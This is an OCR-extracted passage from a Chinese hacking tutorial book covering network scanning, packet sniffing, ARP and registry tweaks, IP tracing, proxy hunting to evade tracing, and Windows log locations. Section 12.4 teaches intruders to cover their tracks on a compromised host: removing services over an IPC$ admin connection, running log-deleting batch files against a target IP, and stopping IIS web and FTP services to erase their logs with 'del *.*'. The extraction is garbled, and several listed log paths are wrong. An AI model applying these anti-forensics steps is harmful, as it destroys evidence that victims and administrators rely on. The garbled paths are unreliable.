　　图 11-50 解析数据信息图 11-51 “互联星空”窗口 

Step11在右边的列表中选择“端口扫描”选项后，单击“开始”按钮，即可打开“端口扫描参
数设置”对话框，如图 11-52所示。 

Step12在设置起始 IP和结束 IP之后，单击“常用端口”按钮，即可将常用的端口显示在“端
口列表”文本区域内，如图 11-53所示。


　　


图 11-52 “端口扫描参数设置”对话框图 11-53 设置端口信息 

Step13单击 OK按钮，即可进行扫描端口操作，在扫描的同时，将扫描结果显示在下面的“日志”
列表中，在其中即可看到各个主机开启的端口，如图 11-54所示。 

Step14在“互联星空”窗口右边的列表中选择“ DHCP服务扫描”选项后，单击“开始”按钮，
即可进行 DHCP服务扫描操作，如图 11-55所示。

图 11-54 查看主机开启的端口

图 11-55 扫描 DHCP服务 
11.3.2.捕获 TCP/IP数据包 
SmartSniff可以让用户捕获自己的网络适配器的 TCP/IP数据包，并且可以按顺序查看客户端

与服务器之间会话的数据。用户可以使用 ASCII模式（用于基于文本的协议，如 HTTP、SMTP、 微视频POP3与 FTP）、十六进制模式来查看 TCP/IP会话（用于基于非文本的协议，如 DNS）。
利用 SmartSniff捕获 TCP/IP数据包的具体操作步骤如下。 

Step01单击桌面上的 SmartSniff程序图标，打开 SmartSniff主窗口，如图 11-56所示。 

Step02单击“开始捕获”按钮或按 F5键，开始捕获当前主机与网络服务器之间传输的数据包，
如图 11-57所示。
209


　　　


　图 11-56 SmartSniff主窗口图 11-57 捕获数据包信息 

Step03单击“停止捕获”按钮或按 F6键，停止捕获数据，在列表中选择任意一个 TCP类型的
数据包，即可查看其数据信息，如图 11-58所示。 

Step04在列表中选择任意一个 UDP协议类型的数据包，即可查看其数据信息，如图 11-59所示。

　


　　图 11-58 停止捕获数据图 11-59 查看数据信息 

Step05在列表中选中任意一个数据包，单击“文件”→“属性”命令，在弹出的“属性”对话
框中可以查看其属性信息，如图 11-60所示。 

Step06在列表中选中任意一个数据包，单击“视图”→“网页报告 -TCP/IP数据流”命令，即可以网页形式查看数据流报告，如图 11-61所示。



　　

图 11-60 “属性”对话框图 11-61 以网页形式查看数据流报告
11.3.3.捕获上下行数据包
网络数据包嗅探专家是一款监视网络数据运行的嗅探器，它能够完整地捕捉到所处局域网中所

有计算机的上行、下行数据包，用户可以将捕捉到的数据包保存下来，以进行监视网络流量、分析微视频数据包、查看网络资源利用、执行网络安全操作规则、鉴定分析网络数据，以及诊断并修复网络问题等操作。
使用网络数据包嗅探专家的具体操作步骤如下。 

Step01打开网络数据包嗅探专家程序，其工作界面如图 11-62所示。

图 11-62 “网络数据包嗅探专家”工作界面 

Step02单击“开始嗅探”按钮
，开始捕获当前网络数据，如图 11-63所示。

图 11-63 捕获当前网络数据 


“停止嗅探”按钮
，停止捕获数据包，当前的所有网络连接数据将在下方显示出来，
如图 11-64所示。 

Step04单击“ IP地址连接”按钮，将在上方窗格中显示前一段时间内输入与输出数据的源地址
与目标地址，如图 11-65所示。
211


图 11-64 停止捕获数据包

图 11-65 显示源地址与目标地址 

Step05单击“网页地址嗅探”按钮，即可查看当前所连接网页的详细地址和文件类型，如图 
11-66所示。

图 11-66 显示详细地址和文件类型
11.4.实战演练 
11.4.1.实战1：查看系统中的 ARP缓存表
在利用网络欺骗攻击的过程中，经常用到的一种欺骗方式是 ARP欺骗，但在实施 ARP欺骗之前，

需要查看 ARP缓存表。那么如何查看系统的 ARP缓存表信息呢？微视频具体的操作步骤如下。 

Step01右击“开始”按钮，在弹出的快捷菜单中选择“运行”命令，打开“运行”对话框，在“打
开”文本框中输入 cmd命令，如图 11-67所示。 
Step02单击“确定”按钮，打开“命令提示符”窗口，如图 11-68所示。


　　　　


　　　　图 11-67 “运行”对话框图 11-68 “命令提示符”窗口 

Step03在“命令提示符”窗口中输入 arp -a命令，按 Enter键执行命令，即可显示出本机系统的 ARP缓存表中的内容，如图 11-69所示。 

Step04在“命令提示符”窗口中输入 arp -d命令，按 Enter键执行命令，即可删除 ARP表中所有的内容，如图 11-70所示。


　　　　


　　　图 11-69 ARP缓存表　　　图 11-70 删除 ARP表 
11.4.2.实战2：在网络邻居中隐藏自己
如果不想让别人在网络邻居中看到自己的计算机，可把自己的计算机名称在网络邻居里隐藏，

具体的操作步骤如下。 微视频

Step01右击“开始”按钮，在弹出的快捷菜单中选择“运行”命令，打开“运行”对话框，在“打
开”文本框中输入 regedit命令，如图 11-71所示。 
Step02单击“确定”按钮，打开“注册表编辑器”窗口，如图 11-72所示。



　　　　
　　　　　图 11-71 “运行”对话框图 11-72 “注册表编辑器”窗口
213


在“注册表编辑器”窗口中，展开分支到 HKEY_LOCAL_MACHINE\System\ 
CurrentControlSet\Services\LanManServer\Parameters子键下，如图 11-73所示。 

Step04选中 Hidden子键并右击，从弹出的快捷菜单中选择“修改”命令，打开“编辑字符串”
对话框，如图 11-74所示。

　　


　　　　　图 11-73 展开分支图 11-74 “编辑字符串”对话框 

Step05在“数值数据”文本框中将 DWORD类键值从 0设置为 1，如图 11-75所示。 

Step06单击“确定”按钮，就可以在网络邻居中隐藏自己的计算机，如图 11-76所示。


　　　　


　图 11-75 设置数值数据为 1 图 11-76 网络邻居
12第 
章



入侵痕迹的追踪与清理
从入侵者与远程主机 /服务器建立连接起，系统就开始把入侵者的 IP地址及相应操作事件记录下来，系统管理员可以通过这些日志文件找到入侵者的入侵痕迹，从而获得入侵证据及入侵者的 IP地址。本章介绍信息追踪与入侵痕迹的清理方法。 
12.1.信息的追踪与防御
随着网络应用技术的发展，如何保护网络生活的隐私越来越引起了人们的重视，有什么办法可以使用户躲避多变的网络追踪和攻击呢？实际上，使用好代理工具，实现通过跳板访问网络，就可以轻松实现这一目标。 
12.1.1.定位 IP物理地址
在网络管理中，常常需要精确地定位某个 IP地址的所在地，实际上，使用一些简单命令和方

法即可完成 IP地址的地位。下面介绍使用网站定位 IP物理地址的方法，具体的操作步骤如下。 微视频
Step01打开一个 IP地址查询网站，这里打开 http://www.ip.cn网站。如果要查找已知的 IP地址，直接在“请输入 IP地址”文本框中输入要查找的 IP地址，如图 12-1所示。 
Step02单击“查询”按钮，即可得到查询 IP地址的物理位置信息，如图 12-2所示。


　　　　


　　图 12-1 输入 IP地址图 12-2 物理位置信息
12.1.2.追踪路由信息 
NeoTrace Pro v3.25（网络追踪器）是一款相当受欢迎的网络路由追踪软件，用户可以只输入远
微视频程计算机的 E-Mail、IP位置或超链接 URL位置等，其软件本身会自动帮助用户显示介于本机计算机与远端机器之间的所有节点与相关的登记资讯。使用 NeoTrace Pro v3.25追踪信息的操作步骤如下。 

Step01双击桌面上的 NeroTrace Pro应用程序图标，即可进入其主操作界面，在目标栏中输入
想要追踪的网址，例如这里输入 www.baidu.com，如图 12-3所示。 

Step02单击右侧的 Go按钮，即可开始进入追踪状态，如图 12-4所示。


　


　　　　图 12-3 输入想要追踪的网址图 12-4 追踪状态 

Step03扫描完毕后，单击 Map View右侧的下拉按钮，在弹出的下拉列表中选择 List View选项，如图 12-5所示。 

Step04这样在 NeroTrace Pro工作界面的左侧窗格中显示追踪的详细列表，如图 12-6所示。


　


图 12-5 List View选项图 12-6 追踪的详细列表 

Step05单击 Map View右侧的下拉按钮，在弹出的下拉列表中选择 Node View选项，即可以 Node View的方式显示追踪结果，如图 12-7所示。

图 12-7 显示追踪结果 
12.1.3.信息追踪的防御
使用代理服务器可以实现通过跳板访问网络，这样就可以有效防御信息的追踪了。代理服务器英文全称是 Proxy Server，其功能是代理网络用户去取得网络信息，相当于网络信息的中转站。使用代理服务器可以提高上网速度、访问一些原本访问不了或访问速度极慢的网站等。
代理猎手是一款集搜索与验证于一身的软件，可以快速查找网络上的免费 Proxy。其主要特点为：支持多网址段、多端口自动查询；支持自动验证并给出速度评价；等等。 
1.添加搜索任务

在利用“代理猎手”查找代理服务器之前，还需要添加相应的搜索任务，具体的操作步骤如下。 

Step01在启动代理猎手的过程中，代理猎手还会给出一些警告信息，如图 12-8所示。 

Step02单击“我知道了，快让我进去吧！”按钮，即可进入“代理猎手”窗口，如图 12-9所示。

　　


　　图 12-8 警告信息图 12-9 “代理猎手”窗口 

Step03在“代理猎手”窗口中选择“搜索任务”→“添加任务”命令，即可打开“添加搜索任务”
对话框，在“任务类型”下拉列表框中有“定时开始搜索”“搜索完毕关机”和“搜索网址范围” 3个选项，这里选择“搜索网址范围”选项，如图 12-10所示。 

Step04单击“下一步”按钮，即可进入“地址范围”设置界面，如图 12-11所示。


　


图 12-10 “添加搜索任务”对话框图 12-11 “地址范围”设置界面 

Step05单击“添加”按钮，即可弹出“添加搜索 IP范围”对话框，在其中根据实际情况设置 
IP地址范围，如图 12-12所示。 

Step06单击“确定”按钮，即可完成 IP地址范围的添加，如图 12-13所示。

　　　　


图 12-12 设置 IP地址范围图 12-13 完成 IP地址范围的添加 

Step07在“地址范围”设置界面中若单击“选取已定义的范围”按钮，则可弹出“预定义的 IP
地址范围”对话框，如图 12-14所示。 

Step08单击“添加”按钮，即可打开“添加搜索 IP范围”对话框，如图 12-15所示。


　　　　


图 12-14 “预定义的 IP地址范围”对话框　图 12-15 “添加搜索 IP范围”对话框 

Step09在其中根据实际情况设置 IP地址范围并输入相应地址范围说明之后，单击“确定”按钮，
即可完成添加操作，如图 12-16所示。

Step10如果在“预定义的 IP地址范围”对话框中单击“打开”按钮，则可打开“读入地址范围”
对话框，如图 12-17所示。


　　　　


图 12-16 完成 IP范围的添加图 12-17 “读入地址范围”对话框 

Step11在其中选择代理猎手已预设 IP地址范围的文件，并将其读入“预定义的 IP地址范围”
对话框中，在其中选择需要搜索的 IP地址范围，如图 12-18所示。 


“使用”按钮，即可将预设的 IP地址范围添加到搜索 IP地址范围中，如图 12-19所示。


　　　


　　图 12-18 选择 IP地址范围图 12-19 添加搜索 IP地址范围 

Step13单击“下一步”按钮，即可打开“端口和协议”界面，如图 12-20所示。 

Step14单击“添加”按钮，即可打开“添加端口和协议”对话框，在其中根据实际情况输入相
应的端口，如图 12-21所示。


　　　　

　　图 12-20 “端口和协议”界面图 12-21 “添加端口和协议”对话框

Step15单击“确定”按钮，即可完成添加操作。再单击“完成”按钮，即可完成搜索任务的设置，
如图 12-22所示。 
2.设置各项参数

在设置好搜索的 IP地址范围之后，就可以开始进行搜索了，但为了提高搜索效率，还有必要先设置一下代理猎手的各项参数。具体的操作步骤如下。 

Step01在“代理猎手”窗口中选择“系统”→“参数设置”命令，即可打开“运行参数设置”
对话框。在“搜索验证设置”选项卡中，设置“搜索设置”“验证设置”“局域网或拨号上网”“搜索方法”“其他设置”等选项（这里勾选“启用先 Ping后连的机制”复选框以提高搜索效果），如图 12-23所示。


　　


　图 12-22 添加搜索任务图 12-23 “运行参数设置”对话框
提示：代理猎手默认的搜索、验证和 Ping的并发数量分别为 50、80和 100，如果用户的带宽无法达到，就最好相应地减少各个并发数量，以减轻网络的负担。 

Step02此外，用户还可以在“验证数据设置”选项卡中添加、修改和删除“验证资源地址”及
其参数，如图 12-24所示。 

Step03在“代理调度设置”选项卡中还设置代理调度参数，以及代理调度范围等选项，如图 
12-25所示。



　　
图 12-24 “验证数据设置”选项卡图 12-25 “代理调度设置”选项卡

Step04在“其他设置”选项卡中设置拨号、搜索验证历史、运行参数等选项，如图 12-26所示。 

Step05在设置好代理猎手的各项参数之后，单击“确定”按钮，即可返回“代理猎手”工作界面，
如图 12-27所示。


　


　图 12-26 “其他设置”选项卡图 12-27 “代理猎手”工作界面 
3.查看搜索结果

在搜索完毕之后，就可以查看搜索的结果了，具体的操作步骤如下。 

Step01选择“搜索任务”→“开始搜索”命令，即可开始搜索设置的 IP地址范围，如图 12-28
所示。 

Step02选择“搜索结果”选项卡，其中“验证状态”为 Free的代理即为可以使用的代理服务器，
如图 12-29所示。


　


　图 12-28 “搜索任务”选项卡图 12-29 “搜索结果”选项卡
注意：一般情况下，验证状态为 Free的代理服务器很少，只要验证状态为 Good就可以使用了。 

Step03在找到可用的代理服务器之后，将其 IP地址复制到“代理调度”选项卡中，代理猎手
就可以自动为服务器进行调度了，多增加几个代理服务器可以有利于网络速度的提高，如图 12-30所示。

图 12-30 “代理调度”选项卡
注意：用户也可以将搜索到的可用代理服务器 IP地址和端口，输入网页浏览器的代理服务器设置选项中，这样，用户就可以通过该代理服务器进行网上冲浪了。 
12.2.黑客留下的脚印
日志是黑客留下的脚印，其本质就是对系统中的操作进行的记录，用户对计算机的操作和应用程序的运行情况都能记录下来，所以黑客在非法入侵计算机以后所有行动的过程也会被日志记录在案。 
12.2.1.日志的详细定义
日志文件是 Windows系统中一个比较特殊的文件，它记录着 Windows系统中所发生的一切，如各种系统服务的启动、运行、关闭等信息。日志文件通常有应用程序日志、安全日志、系统日志、 DNS服务器日志和 FTP日志等。 
1.日志文件的默认位置 

① DNS日志的默认位置： %systemroot%\system32\con.g，默认文件大小为 512KB，管理员都会改变这个默认大小。

②安全日志文件默认位置：%systemroot%\system32\con.g\SecEvent.EVT。

③系统日志文件默认位置：%systemroot%\system32\con.g\sysEvent.EVT。

④应用程序日志文件：%systemroot%\system32\con.g\AppEvent.EVT。 



⑤ Internet信息服务 FTP日志默认位置： %systemroot%\system32\log.les\msftpsvc1\，默认每天一个日志。 

⑥ Internet信息服务 WWW日志默认位置： %systemroot%\system32\log.les\w3svc1\，默认每天一个日志。 

⑦ Scheduler服务日志默认位置：%systemroot%\schedlgu.txt。 
2.日志在注册表里的键


①应用程序日志、安全日志、系统日志、 DNS服务器日志的文件在注册表中的键为： HKEY_ LOCAL_MACHINE\system\CurrentControlSet\Services\Eventlog，有的管理员很可能将这些日志重定位。其中 Eventlog下面有很多子表，里面可查看到以上日志的定位目录。 

② Schedluler服务日志在注册表中的键为： HKEY_LOCAL_MACHINE\SOFTWARE\ Microsoft\ SchedulingAgent。


3. FTP和 WWW日志 

FTP日志和 WWW日志在默认情况下，每天生成一个日志文件，包括当天的所有记录。文件名通常为 ex（年份）（月份）（日期），从日志里能看出黑客入侵时间、使用的 IP地址以及探测时使用的用户名，这样使得管理员可以想出相应的对策。 
12.2.2.为什么要清理日志 
Windows网络操作系统都设计有各种各样的日志文件，如应用程序日志、安全日志、系统日志、 Scheduler服务日志、 FTP日志、 WWW日志、 DNS服务器日志等，根据用户的系统开启的服务的不同而有所不同。
在 Windows系统中，日志文件通常有应用程序日志、安全日志、系统日志、 DNS服务器日志、 FTP日志、WWW日志等，其扩展名为 log.txt。
黑客们在获得服务器的系统管理员权限之后就可以随意破坏系统上的文件了，包括日志文件。但是这一切都将被系统日志所记录下来，所以黑客们想要隐藏自己的入侵踪迹，就必须对日志进行修改，最简单的方法就是删除系统日志文件。
为了防止管理员发现计算机被黑客入侵后，通过日志文件查到黑客的来源，入侵者都会在断开与自己入侵的主机连接前删除入侵时的日志。 
12.3.分析系统日志信息
作为一名入侵者，在清理入侵记录和痕迹之前，最好先分析一个入侵日志，从中找出需要保留的入侵信息和记录。 WebTrends是一款非常好的日志分析软件，它可以很方便地生成日报、周报和月报等，并有多种图表生成方式，如柱状图、曲线图、饼图等。 
12.3.1.安装日志分析工具
在使用之前先安装 WebTrends软件，具体的操作步骤如下。 


Step01下载并双击 WebTrends安装程序图标，打开“ License Agreement（安装许可协议） ”微视频对话框，如图 12-31所示。 

Step02在认真阅读安装许可协议后，单击“ Accept（同意）”按钮，即可进入“ Welcome!（欢迎安装向导）”对话框，在“ Please select from the following options（请从以下选项中选择）”中选中 “Install a time limited trial（安装有时间限制）”单选按钮，如图 12-32所示。



　　
图 12-31 “安装许可协议”对话框图 12-32 “欢迎安装向导”对话框
223


Step03单击 Next按钮，打开“ Select Destination Directory（选择目标安装位置）”对话框，在其中选择目标程序安装的位置，如图 12-33所示。 

Step04在选择好需要安装的位置之后，单击 Next按钮，打开“ Ready to Install（准备安装）”对话框，在其中可以看到安装复制的信息，如图 12-34所示。


　　　　


　图 12-33 “安装许可协议”对话框　图 12-34 “欢迎安装向导”对话框 

Step05单击 Next按钮，打开“ Installing（正在安装）”对话框，在其中看到安装的状态并显示安装进度条，如图 12-35所示。 

Step06安装完成之后，打开“Install Completed!（安装完成）”对话框，单击“Finish（完成）”按钮，即可完成整个安装过程，如图 12-36所示。
　　　　
图 12-35 “正在安装”对话框图 12-36 “安装完成”对话框 
12.3.2.创建日志站点
另外，在 WebTrends使用之前，用户还必须先建立一个新的站点。在 WebTrends中创建日志站点的具体操作步骤如下。 

Step01在安装 WebTrends完成之后，选择“开始”→“所有程序”→ WebTrends LogAnalyzer选项，打开“ WebTrends Product licensing（输入序列号）”对话框，在其中输入序列号，如图 12-37所示。 




Step02单击“ Submit（提交）”按钮，如果看到“添加序列号成功”提示，则说明该序列号是
可用的，如图 12-38所示。 

Step03单击“确定”按钮之后，单击“ Exit（退出）”按钮，即可看到“ Proferer WebTrends
（WebTrends目录）”窗口，如图 12-39所示。 

Step04单击“ Start Using Product（开始使用产品）”按钮，即可打开“ Registration（注册）”对话框，如图 12-40所示。


　　


　　　图 12-37 “输入序列号”对话框图 12-38 信息提示框


　　　　


　　图 12-39 “WebTrends目录”窗口图 12-40 “注册”对话框 

Step05单击“ Register Later（以后注册）”按钮，打开 WebTrends Log Analyzer主窗口，如图 12-41所示。 

“New（新建）”按钮，打开“添加站点日志 --标题，URL”对话框，在 “Description（描述）”文本框中输入准备访问日志的服务器类型名称；在“ Log File URL Path（日志文件 URL路径）”下拉列表中选择存放方式；在后面的文本框中输入相应的路径；在“ Log File Format（日志文件格式）”下拉列表中看以看出 WebTrends支持多种日志格式，这里选择“ Auto-detect log .le type（自动监听日志文件类型）”选项，如图 12-42所示。



　　
　图 12-41 WebTrends Log Analyzer主窗口图 12-42 “添加站点日志 --标题，URL”对话框

Step07单击“下一步”按钮，打开“添加站点日志 --查询 DNS”对话框，在其中设置站点的
日志 IP采用查询 DNS的方式，如图 12-43所示。 

Step08单击“下一步”按钮，打开“添加站点日志 --站点首页”对话框，在其中设置站点的首
页文件和 URL等属性，如图 12-44所示。

　


图 12-43 “添加站点日志 --查询 DNS”对话框　图 12-44 “添加站点日志 --站点首页”对话框 

Step09单击“下一步”按钮，打开“添加站点日志 --过滤”对话框，在其中需要设置 WebTrend
对站点中哪些类型的文件做日志，这里默认的是所有文件类型（Include all），如图 12-45所示。 

Step10单击“下一步”按钮，打开“添加站点日志 --数据和真实时间”对话框，在其中勾选 “Use 
FastTrends Database（使用快速分析数据库）”复选框和“Analyze log .le in real-time（在真实时间分析日志）”复选框，如图 12-46所示。


　


图 12-45 “添加站点日志 --过滤”对话框图 12-46 “添加站点日志 --数据和真实时间”对话框 

Step11单击“下一步”按钮，打开“添加站点日志 --高级设置”对话框，这里勾选“Store Fast 
Trends database in Default location（在本地保存快速生成的数据库）”复选框，如图 12-47所示。 
Step12单击“完成”按钮，即可完成新建日志站点，在 WebTrends Log Analyzer窗口可看到新创建的 Web站点，如图 12-48所示。

　


图 12-47 “添加站点日志 --高级设置”对话框图 12-48 完成新建日志站点 
12.3.3.生成日志报表
一个日志站点创建完成后，等待一定访问量后就可以对指定的目标主机进行日志分析并生成日志报表了，具体的操作步骤如下。 

Step01在“WebTrends Log Analyzer”主窗口中单击“工具栏”中的“ Report（报告）”按钮打开 “Create Report（生成报告）”对话框，在“Report Range（报告类型）”列表中可以看到 WebTrends提供多种日志的产生时间以供选择，这里选择所有的日志。还需要对报告的风格、标题、文字、显示哪些信息（如访问者 IP、访问时间、访问内容等）等信息进行设置，如图 12-49所示。 

Step02单击“ Start（开始）”按钮，即可对选择的日志站点进行分析并生成报告，如图 12-50
所示。

　


　　图 12-49 “生成报告”对话框图 12-50 分析日志报告 

Step03待分析完毕之后，即可看到以 HTML形式的报告，在其中可以看到该站点的各种日志
信息，如图 12-51所示。

图 12-51 HTML形式日志报告 
12.4.清除服务器入侵日志
黑客在入侵服务器的过程中，其操作会留下痕迹，本节主要讲述如何清除这些痕迹。清除日志
是黑客入侵后必须要做的一件事情。下面详细介绍黑客是通过什么样的方法把记录自己痕迹的日志
删除掉的。 
12.4.1.删除系统服务日志
使用 SRVINSTW可以删除系统服务日志，具体的操作步骤如下。 
微视频
Step01如果黑客已经通过图形界面控制对方的计算机，在该计算机上运行 SRVINSTW.exe程序，即可打开“欢迎使用本软件”对话框，在其中选中“移除服务”单选按钮，如图 12-52所示。 

Step02单击“下一步”按钮，即可打开“计算机类型选择”对话框，在“请选择要执行的计算
机类型”栏目中选中“本地机器”单选按钮，如图 12-53所示。


　


图 12-52 “欢迎使用本软件”对话框图 12-53 “计算机类型选择”对话框
提示：如果没有控制目标的计算机，但已经和对方建立具有管理员权限的 IPC$连接，此时应该在图 12-53所示对话框中选中 “远程机器 ”单选按钮，并在 “计算机名 ”文本框中输入远程计算机的 IP地址之后，单击“下一步”按钮，同样可以将该远程主机中的服务删除。

Step03单击“下一步”按钮，即可打开“服务名选择”对话框，在“服务名”下拉列表中选择
需要删除的服务选项，这里选择“IP 转换配置服务”选项，如图 12-54所示。 

Step04单击“下一步”按钮，即可打开“准备好移除服务”对话框，如图 12-55所示。


　


　图 12-54 “服务名选择”对话框　　　图 12-55 “准备好移除服务”对话框 

Step05如果确定要删除该服务，单击“完成”按钮，即可看到“服务成功移除”提示框，如图 12-56所示。单击“确定”按钮，即可将主机中的服务删除。 
12.4.2.批处理清除日志信息


在一般情况下，日志会忠实地记录它接收到的任何请求，用户会通过查图 12-56 信息提示框看日志来发现入侵的企图，从而保护自己的系统。所以黑客在入侵系统成功后，首先便是清除该计算机中的日志，擦去自己的形迹。除手工删除外，还可以通过创建批处理文件来删除日志。
具体的操作步骤如下。 


Step01在记事本中编写一个可以清除日志的批处理文件，其具体的内容如下。 


Step02把上述内容保存为 del.bat备用。再新建一个批处理文件并将其保存为 clear.bat文件，其具体内容如下。 

在上述代码中 echo是 DOS下的回显命令，在它的前面加上“ @”前缀字符，表示执行时本行
在命令行或 DOS里面不显示，它是删除文件命令。 

Step03假设已经与肉鸡进行了 IPC连接之后，在“命令提示符”窗口中输入 clear.bat 192.168.0. 
10命令，即可清除该主机上的日志文件。 
12.4.3.清除 WWW和 FTP日志信息
黑客在对目标服务器实施入侵之后，为了防止网络管理员对其进行追踪，往往要删除留下的 IP记录和 FTP记录，但这种系统日志用手工的方法很难清除，这时需要借助于其他软件进行清除。在 Windows系统中， WWW日志一般都存放在 %winsystem%\sys tem32\log.les\w3svc1文件夹中，包括 WWW日志和 FTP日志。 
Windows 10系统中一些日志的存放路径和文件名如下： 
●安全日志：C:\windows\system\system32\con.g\Secevent.evt。 

●应用程序日志：C:\windows\system\system32\con.g\AppEvent.evt。 

●系统日志：C:\windows\winsystem\system32\con.g\SysEvent.evt。 

● IIS的 FTP日志：C:\windows\system%\system32\log.les\msftpsvc1\，默认每天一个日志。 

● IIS的 WWW日志：C:\windows\system\system32\log.les\w3svc1\，默认每天一个日志。 

● Scheduler服务日志：C:\windows\winsystem\schedlgu.txt。 

●注册表项目：[HKLM]\system\CurrentControlSet\Services\Eventlog。 

● Schedluler服务注册表所在项目：[HKLM]\SOFTWARE\Microsoft\SchedulingAgent。 


1.清除 WWW日志

在 IIS中 WWW日志默认的存储位置是： C:\windows\system\system32\log.les\w3svc1\，每天都产生一个新日志。如果管理员对其存放位置进行了修改，则可以运用 iis.msc对其进行查看，再通过查看网站的属性来查找到其存放位置，此时，就可以在“命令提示符”窗口中通过“ del *.*”命令来清除日志文件了。
但这个方法删除不掉当天的日志，这是因为 w3svc服务还在运行着。可以用 net stop w3vsc命令把这个服务停止之后，再用 del *.*命令，就可以清除当天的日志了。还可以用记事本把日志文件打开，删除其内容之后再进行保存也可以清除日志。最后用 net start w3svc命令再启动 w3svc服务就可以了。提示：删除日志前必须先停止相应的服务，再进行删除即可。日志删除后务必要记得再打开相应的服务。 
2.清除 FTP日志 

FTP日志的默认存储位置为 C:\windows\system\system32\log.les\msftpsvc1\，其清除方法和清除 WWW日志的方法差不多，只是所要停止的服务不同。
清除 FTP日志的具体操作步骤如下。 


Step01在“命令提示符”窗口中运行 net stop mstfpsvc命令即可停掉 msftpsvc服务，如图 12-57所示。 

Step02运行 del *.*命令或找到日志文件，并将其内容删除。 

Step03最后通过运行 net start msftpsvc命令，再打开 msftpsvc服务即可，如图 12-58所示。提示：也可修改目标计算机中的日志文件，其中 WWW日志文件存放在 w3svc1文件夹下， FTP日志文件存放在 msftpsvc文件夹下，每个日志都是以 eX.log为命名的（其中 X代表日期）。


　　　　


　　图 12-57 停止 msftpsvc服务图 12-58 运行 msftpsvc服务 
12.5.实战演练 
12.5.1.实战1：在 IE中设置代理服务器
使用代理服务器之前要先对其进行设置，下面以在 IE浏览器中设置代理服务器为例进行简单

的介绍。在 IE浏览器中设置代理服务器的具体操作步骤如下。 微视频

Step01右击 IE图标，从弹出的快捷菜单中选择“属性”命令，即可打开 “Internet属性”对话框，
选择“连接”选项卡，如图 12-59所示。 

Step02单击“局域网设置”按钮，即可打开“局域网（ LAN）设置”对话框，勾选“为 LAN
使用代理服务器（这些设置不应用于拨号或 VPN连接）”复选框，然后在“地址”文本框和“端口”文本框中输入代理服务器的地址和端口号，如图 12-60所示。


　　　　


　　图 12-59 “连接”选项卡图 12-60 “局域网（LAN）设置”对话框 

Step03单击“确定”按钮完成设置之后，再使用 IE浏览器时将会发现，无论浏览哪个网站， 
IE浏览器总是会先和代理服务器建立连接。 
12.5.2.实战2：清理系统盘中的垃圾文件

在没有安装专业的清理垃圾的软件前，用户可以手动清理磁盘垃圾临时文件，为系统盘瘦身。微视频
231

具体的操作步骤如下。 

Step01选择“开始”→“所有应用”→“ Window系统”→“运行”命令，在“打开”文本框
中输入 cleanmgr，按 Enter键确认，如图 12-61所示。 

Step02弹出“磁盘清理：驱动器选择”对话框，单击“驱动器”下面的下拉按钮，在弹出的下
拉菜单中选择需要清理临时文件的磁盘分区，如图 12-62所示。


　　　　


　　图 12-61 “运行”对话框图 12-62 选择驱动器 

Step03单击“确定”按钮，弹出“磁盘清理”对话框，并开始自动计算清理磁盘垃圾，如图 
12-63所示。 

Step04弹出“ Windows10（C:）的磁盘清理”对话框，在“要删除的文件”列表中显示扫描出
的垃圾文件和大小，选择需要清理的临时文件，单击“清理系统文件”按钮，如图 12-64所示。

　　


　　　　图 12-63 “磁盘清理”对话框图 12-64 选择要清理的文件 

Step05系统开始自动清理磁盘中的垃圾文件，并显示清理的进度，如图 12-65所示。

图 12-65 清理垃圾文件